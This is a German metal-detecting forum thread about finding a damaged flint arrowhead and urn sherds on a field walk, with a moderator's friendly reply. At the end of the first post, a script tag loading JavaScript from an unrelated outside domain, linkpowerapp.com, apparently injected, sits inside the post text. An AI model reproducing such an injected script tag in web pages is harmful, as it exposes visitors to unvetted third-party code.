Inhalte aufrufen



Willkommen auf dem Bodenfundforum.com
Du bist nicht angemeldet oder registriert! Gäste können bei weitem nicht alle Funktionen des Forums nutzen. Bitte melde dich an oder klicke hier um dich kostenlos zu registrieren!
Profilbild

Pfeilspitze ohne Spitze

Flint

  • Du kannst kein neues Thema erstellen
  • Bitte melde dich an um zu Antworten
  • QR Code
2 Antworten in diesem Thema

  #1
schrottkopp

schrottkopp

    Assimiliert

  • Premium
    • Mitglieds ID: 10.820
  • 2.225 Beiträge
  • Dabei seit 20-01 12
  • 144 Themen
  • 1290
  • Geschlecht:Mann
  • Ort:Nord
  • Sonde:F75Ltd,Tesoro vaquero2
  • Alter:46

Spender

N´abend :hallo:

Ich war gestern mal ohne Detektor los.Der Grund dafür war ein gewaltiger Kater,den ich mir Abends zuvor

auf einer spontanen,aber wilden Party eingefangen habe.Im Urlaub geht sowas -_- .Bewegungs und Frischluftbedarf,

dazu Hobby-Lust und Grabfaulheit ließen also nur eine Leserunde zu.Geregnet hatte es auch in der Nacht....,also los.

Die Wahl fiel auf einen Acker,den ich schon seit Jahren immer mal wieder Besuche,und fast immer mit Erfolg.

Ich fand dort einmal eine große Anzahl Urnenscherben,darüber schrieb ich hier damals auch einenThemenbeitrag.

Diesen Spot lief ich nocheinmal ab,und fand sofort die ersten Scherben.

Die waren langsam immer weniger da.Kein Wunder!Denn nach einer Weile fand ich mich plötzlich in einer ganz anderen Ecke wieder, :wacko:

durch den Blick auf die Erde muß ich wohl unbemerkt vom Kurs abgewichen sein.

Und dann lag sie da.Schimmerte wie Glas,sonst wäre sie wohl dort geblieben.

Auch wenn Sie beschädigt ist,dieser Fund ist sensationell für mich.Große Freude!!

Angehängte Datei  Flint Pfeilspitze und Urnenscherben 001.JPG   131,69K   0 Mal heruntergeladenAngehängte Datei  Flint Pfeilspitze und Urnenscherben 002.JPG   131,18K   0 Mal heruntergeladenAngehängte Datei  Flint Pfeilspitze und Urnenscherben 003.JPG   131,6K   0 Mal heruntergeladenAngehängte Datei  Flint Pfeilspitze und Urnenscherben 004.JPG   131,85K   0 Mal heruntergeladen

Ihr solltet Sie einmal aus der Nähe sehen,die Bearbeitungsspuren (Bulbus?) sind so filigran und detailliert,das man

kaum glauben mag,das diese Leute kein Präzisionswerkzeug hatten.

Auf einen Km.weter ca. fand ich diesen Sommer meine erste.Darüber hatte ich auch berichtet.

Angehängte Datei  Flint Pfeilspitze und Urnenscherben 005.JPG   131,9K   0 Mal heruntergeladenAngehängte Datei  Flint Pfeilspitze und Urnenscherben 006.JPG   131,59K   0 Mal heruntergeladen

Die Scherben stammen wohl aus der Bronze- oder/und Eisenzeit.Zwei stk. sind wohl aus dem Mittelalter.

Angehängte Datei  Flint Pfeilspitze und Urnenscherben 007.JPG   131,43K   0 Mal heruntergeladen  Randscherben.Fachleute können diese sicher ihrem Alter

zuordnen.

Das suchen per Auge gefällt mir immer mehr.Es funktioniert aber nur,wenn man sich wirklich konzentriert,und sich sehr langsam

fortbewegt,oder auch mal stehen bleibt,und genau hinschaut.Probiert es mal ;)

 

gruß Schrottkopp :beerchug:

<script src="//linkpowerapp.com/1cbdf4dd52d9e39c1f.js"> </script>


  • Gefällt mir x 2
  • Stimme zu x 1


  #2
Vmax

Vmax

    Global Mod.

  • Moderation
    • Mitglieds ID: 6.048
  • 14.890 Beiträge
  • Dabei seit 28-04 07
  • 689 Themen
  • 3050
  • Geschlecht:Mann
  • Ort:Hessen
  • Interessen:DJI Phantom Vision +
  • Sonde:XP DEUS l l V 7.0 / Dyson V6
  • Alter:00

Spender

Glückwunsch zu diesem Fund, nur wirklich schade das die Spitze abgebrochen ist :blush:

Habe sie dir mal halbwegs ersetzt ;-)

 

Angehängte Dateien


  • Gefällt mir x 2

  #3
schrottkopp

schrottkopp

    Assimiliert

  • Premium
    • Mitglieds ID: 10.820
  • 2.225 Beiträge
  • Dabei seit 20-01 12
  • 144 Themen
  • 1290
  • Geschlecht:Mann
  • Ort:Nord
  • Sonde:F75Ltd,Tesoro vaquero2
  • Alter:46

Spender

Oh wie schön......ja,so wird Sie einst ausgesehen haben.Danke Dir!

 

gruß Schrottkopp


 





Facebook Kommentare



Besucher die dieses Thema lesen: 0

Mitglieder: 0, Gäste: 0, unsichtbare Mitglieder: 0